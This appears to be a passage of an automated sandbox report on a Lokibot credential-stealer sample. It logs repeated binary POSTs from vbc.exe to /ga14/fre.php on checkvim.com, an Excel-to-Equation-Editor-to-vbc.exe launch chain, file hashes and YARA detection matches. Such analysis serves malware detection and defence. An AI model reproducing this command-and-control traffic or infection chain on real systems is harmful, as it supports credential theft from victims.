                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:36.333899975 CEST227OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:36.694550991 CEST227INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    60192.168.2.22492255.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:11.924108982 CEST302OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:12.290452957 CEST302INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    61192.168.2.22492265.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:12.548479080 CEST303OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:12.908385992 CEST304INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    62192.168.2.22492275.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:13.189129114 CEST304OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:13.544517994 CEST305INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:24 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    63192.168.2.22492285.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:13.815165043 CEST306OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:14.177795887 CEST306INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:25 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    64192.168.2.22492295.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:14.436115026 CEST307OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:14.799664974 CEST308INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    65192.168.2.22492305.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:15.070584059 CEST309OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:15.439943075 CEST309INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:26 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    66192.168.2.22492315.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:15.726731062 CEST310OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:16.076317072 CEST311INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:27 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    67192.168.2.22492325.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:16.340414047 CEST311OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:16.690124035 CEST312INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    68192.168.2.22492335.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:16.959594965 CEST313OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.307420969 CEST313INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:28 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    69192.168.2.22492345.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:17.590102911 CEST314OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:17.941711903 CEST315INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.22491725.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:36.981513977 CEST228OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.329349995 CEST229INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    70192.168.2.22492355.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:18.196433067 CEST316OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:18.572170973 CEST316INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:29 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    71192.168.2.22492365.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:18.836328983 CEST317OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:19.181425095 CEST317INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:30 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    72192.168.2.22492375.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    73192.168.2.22492385.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    74192.168.2.22492395.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    75192.168.2.22492405.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    76192.168.2.22492415.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    77192.168.2.22492425.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    78192.168.2.22492435.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    79192.168.2.22492445.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.22491735.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:37.611742973 CEST230OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.968482971 CEST230INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    80192.168.2.22492455.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    81192.168.2.22492465.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    82192.168.2.22492475.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    83192.168.2.22492485.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    84192.168.2.22492495.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    85192.168.2.22492505.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    86192.168.2.22492515.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    87192.168.2.22492525.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    88192.168.2.22492535.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    89192.168.2.22492545.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.22491745.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:38.271241903 CEST231OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:38.657721996 CEST232INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    90192.168.2.22492555.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    91192.168.2.22492565.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    92192.168.2.22492575.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    93192.168.2.22492585.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    94192.168.2.22492595.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    95192.168.2.22492605.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    96192.168.2.22492615.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    97192.168.2.22492625.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    98192.168.2.22492635.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    99192.168.2.22492645.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: EXCEL.EXE PID: 2688 Parent PID: 596

                    General

                    Start time:06:50:14
                    Start date:28/09/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f0f0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Analysis Process: EQNEDT32.EXE PID: 1484 Parent PID: 596

                    General

                    Start time:06:50:35
                    Start date:28/09/2021
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Analysis Process: vbc.exe PID: 1268 Parent PID: 1484

                    General

                    Start time:06:50:38
                    Start date:28/09/2021
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\Public\vbc.exe'
                    Imagebase:0x400000
                    File size:210432 bytes
                    MD5 hash:59A67B5CCF01B6A564265797DC5E53E8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >